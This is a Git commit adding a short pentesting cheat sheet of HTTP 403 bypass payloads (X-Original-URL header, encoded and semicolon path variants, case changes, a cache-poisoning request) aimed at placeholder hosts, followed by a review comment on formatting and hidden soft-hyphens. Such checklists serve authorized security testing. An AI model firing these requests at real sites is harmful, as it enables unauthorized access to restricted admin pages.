Update Bypass 403.md

Mehdi 2023-09-15 16:14:47 +03:30 committed by GitHub
parent f18326c1fa
commit 689daa4bfe
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

Bypass 403.md Normal file

@ -0,0 +1,66 @@
# Bypass 403 (Forbidden)
### Using `X-Original-URL` header
```bash
# Normal Request (403)
GET /admin HTTP/1.1
Host: target.com
# Try this to bypass (200)
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
```
### Appending `%2e` after the first slash
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/%2e/admin
```
### Try add dot `.` slash `/` and semicolon `;` in the URL
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/secret/.
http://target.com//secret//
http://target.com/./secret/..
http://target.com/;/secret
http://target.com/.;/secret
http://target.com//;//secret
```
### Add `..;/` after the directory name
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/admin..;/
```
### Try to uppercase the alphabet in the url
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/aDmIN
```
## Via Web Cache Poisoning
```bash
GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin
```
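Review bot: The header name in the final "Via Web Cache Poisoning" block appears to contain invisible soft-hyphen characters (U+00AD) inside `X-Original-URL`, so a request copied from the page sends a different header than the one shown in the first section; retype that line in plain ASCII as `X-Original-URL: /admin`. That section also lacks the "Normal Request" / "Try this" comments the other blocks have and gives no description of which response is expected to be cached, it uses `victim.com` where every other block uses `target.com`, and its heading is `##` while the sibling sections are `###`. In the dot, slash and semicolon section the baseline request is `/admin` but every variant targets `/secret`; use one path throughout so the before and after are comparable. Minor: the raw HTTP requests and bare URLs are fenced as `bash` although none of them are shell commands, and the heading "Try add dot" should read "Try adding a dot". Since the file is a checklist for authorized testing, a one-line note per section naming the component that causes the discrepancy (front-end proxy honoring `X-Original-URL`, path normalization differences between proxy and back end) would make each finding easier to report and fix.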